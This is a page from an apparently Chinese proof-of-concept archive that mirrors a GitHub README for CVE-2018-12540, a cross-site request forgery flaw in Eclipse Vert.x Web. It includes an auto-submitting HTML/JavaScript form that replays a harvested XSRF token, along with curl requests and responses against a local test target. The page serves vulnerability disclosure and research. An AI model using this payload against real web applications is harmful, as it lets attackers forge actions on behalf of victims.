支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%
立即捐款

POC详情: 66abd595d07b267d2a5f8e6f4f01f60f685b3a86

来源
https://github.com/bernard-wagner/vertx-web-xsrf
关联漏洞
标题:Eclipse Vert.x 跨站请求伪造漏洞 (CVE-2018-12540)
Description:Eclipse Vert.x是Eclipse基金会的一个用于在JVM上构建响应式应用程序的工具包,它主要用于构建网络实用程序、Web应用程序、HTTP/REST微服务等应用程序。 Eclipse Vert.x 3.0.0版本至3.5.2版本中存在安全漏洞,该漏洞源于CSRFHandler没有断言XSRF Cookie是否匹配返回的XSRF ‘header’/‘form’参数。攻击者可利用该漏洞实施重播攻击。
Description
Vert.X CSRF Proof of Concept (CVE-2018-12540)
介绍
## Overview ##

The CSRFHandlerImpl (`io.vertx.ext.web.handler.impl.CSRFHandlerImpl`) in Vert.x Web does not create CSRF Tokens that are unique per user session. A malicious website can still perform CSRF by obtaining a valid CSRF token and adding it to a HTML form and then submitting the form to the vulnerable web application.

Currently, the pre-flight CORS OPTIONS HTTP request prevents CSRF via XMLHTTPRequests, however, there might be a way to circumvent the pre-flight request. 

## Building ##

```
mvn clean package
```

## Testing ##

The application starts HTTP endpoints:
* Port 7777 hosts the malicious website 
* Port 8888 hosts the target website

Create a host entry for `target.local`, to ensure that the attacker and the target are not on the same domain.

The attacker web server will automatically poll the `target.local:8888` webpage for a valid XSRF token. If a user then navigates to the `http://localhost:7777` in their browser it will render an HTML page with an iframe. The iframe will be populated with a form with a valid X-XSRF-TOKEN form attribute that is automatically submitted to `target.local:8888`.

### Running ###

```
java -jar target/vertx-xsrf-1.0-SNAPSHOT-fat.jar
```

## Observed Behaviour ##

#### Chrome PoC ####

![Browser](browser.png)

```
<html>
<head>
</head>
<body>
<script>
var xsrftoken = "eWVJYuhAGvXRuaJFwiY7LBDg6Bk0/llUKea9Q8gIWxY=.1528880809229.awJQ69rmd18ATeEVqH0XC1EAjKXYfzPcIEAse9+ym1o=";

var f = document.createElement("form");
f.setAttribute('method', "post");
f.setAttribute('action', "http://target.local:8888/token");

var i = document.createElement("input"); 
i.setAttribute('type', "text");
i.setAttribute('name', "X-XSRF-TOKEN");
i.setAttribute('value',xsrftoken);

var s = document.createElement("input"); 
s.setAttribute('type', "submit");
s.setAttribute('value', "Submit");

f.appendChild(i);
f.appendChild(s);

document.getElementsByTagName('body')[0].appendChild(f);

f.submit();


</script>
</body>
</html>
```

#### Obtaining X-XSRF-TOKEN ####

```
curl http://target.local:8888/token -v
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> GET /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Length: 8
< Set-Cookie: XSRF-TOKEN=KXTHspnG6reKqXCzpLPj0glJlO5DeMogcl5cuVVNUQg=.1528880169033.xENGuHNUEXi33wdIkIH+Hlq7PSS+0QJgFQbOIVPnYq8=; Path=/
< Set-Cookie: vertx-web.session=13c681351dee77d572f4f9b16d0c65a5; Path=/
<
* Connection #0 to host target.local left intact
Success!
```
#### POST without X-XSRF-TOKEN ####

```
curl -X POST http://target.local:8888/token -v
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> POST /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 403 Forbidden
< Content-Length: 9
<
* Connection #0 to host target.local left intact
Forbidden
```

#### Submitting Invalid X-XSRF-Token as HTTP Header ####

```
curl -X POST -H 'X-XSRF-TOKEN: THISISNOTAVALIDTOKENPj0glJlO5DeMogcl5cuVVNUQg=.1528880169033.xENGuHNUEXi33wdIkIH+Hlq7PSS+0QJgFQbOIVPnYq8=' http://target.local:8888/token -v
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> POST /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
> X-XSRF-TOKEN: THISISNOTAVALIDTOKENPj0glJlO5DeMogcl5cuVVNUQg=.1528880169033.xENGuHNUEXi33wdIkIH+Hlq7PSS+0QJgFQbOIVPnYq8=
>
< HTTP/1.1 403 Forbidden
< Content-Length: 9
<
* Connection #0 to host target.local left intact
Forbidden
```

#### Submitting X-XSRF-Token as HTTP Header ####

```
curl -X POST -H 'X-XSRF-TOKEN: KXTHspnG6reKqXCzpLPj0glJlO5DeMogcl5cuVVNUQg=.1528880169033.xENGuHNUEXi33wdIkIH+Hlq7PSS+0QJgFQbOIVPnYq8=' http://target.local:8888/token -v
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> POST /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
> X-XSRF-TOKEN: KXTHspnG6reKqXCzpLPj0glJlO5DeMogcl5cuVVNUQg=.1528880169033.xENGuHNUEXi33wdIkIH+Hlq7PSS+0QJgFQbOIVPnYq8=
>
< HTTP/1.1 200 OK
< Content-Length: 8
< Set-Cookie: vertx-web.session=23b96851535d983b458e92280ffe49f5; Path=/
<
* Connection #0 to host target.local left intact
Success!
```

#### Submitting Invalid X-XSRF-Token as formAttribute ####

```
curl --data 'X-XSRF-TOKEN=THISISNOTAVALIDTOKENPj0glJlO5DeMogcl5cuVVNUQg%3D.1528880169033.xENGuHNUEXi33wdIkIH%2BHlq7PSS%2B0QJgFQbOIVPnYq8%3D' http://target.local:8888/token -v
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> POST /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Length: 126
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 126 out of 126 bytes
< HTTP/1.1 403 Forbidden
< Content-Length: 9
<
* Connection #0 to host target.local left intact
Forbidden
```

#### Submitting X-XSRF-Token as formAttribute ####

```
curl --data 'X-XSRF-TOKEN=KXTHspnG6reKqXCzpLPj0glJlO5DeMogcl5cuVVNUQg%3D.1528880169033.xENGuHNUEXi33wdIkIH%2BHlq7PSS%2B0QJgFQbOIVPnYq8%3D' http://target.local:8888/token -v
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to target.local (127.0.0.1) port 8888 (#0)
> POST /token HTTP/1.1
> Host: target.local:8888
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Length: 124
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 124 out of 124 bytes
< HTTP/1.1 200 OK
< Content-Length: 8
< Set-Cookie: vertx-web.session=50deb90796d7babc77860be5ae36ae0e; Path=/
<
* Connection #0 to host target.local left intact
Success!
```
文件快照

 [4.0K]  /data/pocs/66abd595d07b267d2a5f8e6f4f01f60f685b3a86
├── [118K]  browser.png
├── [2.6K]  pom.xml
├── [5.6K]  README.md
└── [4.0K]  src
    ├── [4.0K]  main
    │   └── [4.0K]  java
    │       └── [4.0K]  io
    │           └── [4.0K]  vertx
    │               └── [4.0K]  example
    │                   └── [4.0K]  xsrf
    │                       ├── [ 770]  App.java
    │                       ├── [3.4K]  AttackerVerticle.java
    │                       └── [1.7K]  XSRFVerticle.java
    └── [4.0K]  test
        └── [4.0K]  java
            └── [4.0K]  io
                └── [4.0K]  vertx
                    └── [4.0K]  example
                        └── [4.0K]  xsrf
                            └── [ 649]  AppTest.java

13 directories, 7 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。